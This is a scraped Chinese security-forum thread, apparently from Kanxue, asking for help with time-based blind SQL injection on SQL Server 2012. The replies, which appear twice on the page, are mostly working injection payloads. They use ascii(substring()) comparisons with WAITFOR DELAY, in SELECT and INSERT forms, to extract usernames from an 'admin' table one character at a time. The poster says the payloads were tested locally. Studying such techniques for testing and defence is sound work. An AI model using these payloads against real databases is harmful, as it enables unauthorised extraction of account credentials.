[求助]SQL SERVER 2012中尝试对某sql语句进行时间盲注，然后遇到一点问题-WEB安全-看雪-安全社区|安全招聘|kanxue.com

最新回复 (4)
hdog 雪币： 4 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 8 粉丝 0 关注私信	hdog 2 楼 SELECT * FROM admin where username='1' and 1=(select count(*) from admin where username in (select top 1 username from admin) and ascii(substring(username,1,1))>90) WAITFOR delay '0:0:10' 2017-5-10 16:18 0
hdog 雪币： 4 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 8 粉丝 0 关注私信	hdog 3 楼 SELECT * FROM admin where username='1' if (1=(select count(*) from admin where username in (select top 1 username from admin) and ascii(substring(username,1,1))>100)) WAITFOR delay '0:0:10' else WAITFOR delay '0:0:5' 2017-5-10 16:24 0
hdog 雪币： 4 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 8 粉丝 0 关注私信	hdog 4 楼大于符号被编码了，就是这个&gt 2017-5-10 16:25 0
hdog 雪币： 4 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 8 粉丝 0 关注私信	hdog 5 楼使用insert进行基于时间的盲注，我刚刚在本地这样测试的。可能admin表的字段数不一样。如果有更好的方法，麻烦告诉我一下，谢谢哈 INSERT into admin VALUES('test12','test12342','2017-05-010') if (1=(select count(*) from admin where username in (select top 1 username from admin) and ascii(substring(username,1,1))>100))WAITFOR delay '0:0:2' ELSE WAITFOR delay '0:0:5' 2017-5-10 16:51 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

最新回复 (4)
hdog 雪币： 4 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 8 粉丝 0 关注私信	hdog 2 楼 SELECT * FROM admin where username='1' and 1=(select count(*) from admin where username in (select top 1 username from admin) and ascii(substring(username,1,1))>90) WAITFOR delay '0:0:10' 2017-5-10 16:18 0
hdog 雪币： 4 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 8 粉丝 0 关注私信	hdog 3 楼 SELECT * FROM admin where username='1' if (1=(select count(*) from admin where username in (select top 1 username from admin) and ascii(substring(username,1,1))>100)) WAITFOR delay '0:0:10' else WAITFOR delay '0:0:5' 2017-5-10 16:24 0
hdog 雪币： 4 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 8 粉丝 0 关注私信	hdog 4 楼大于符号被编码了，就是这个&gt 2017-5-10 16:25 0
hdog 雪币： 4 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 8 粉丝 0 关注私信	hdog 5 楼使用insert进行基于时间的盲注，我刚刚在本地这样测试的。可能admin表的字段数不一样。如果有更好的方法，麻烦告诉我一下，谢谢哈 INSERT into admin VALUES('test12','test12342','2017-05-010') if (1=(select count(*) from admin where username in (select top 1 username from admin) and ascii(substring(username,1,1))>100))WAITFOR delay '0:0:2' ELSE WAITFOR delay '0:0:5' 2017-5-10 16:51 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复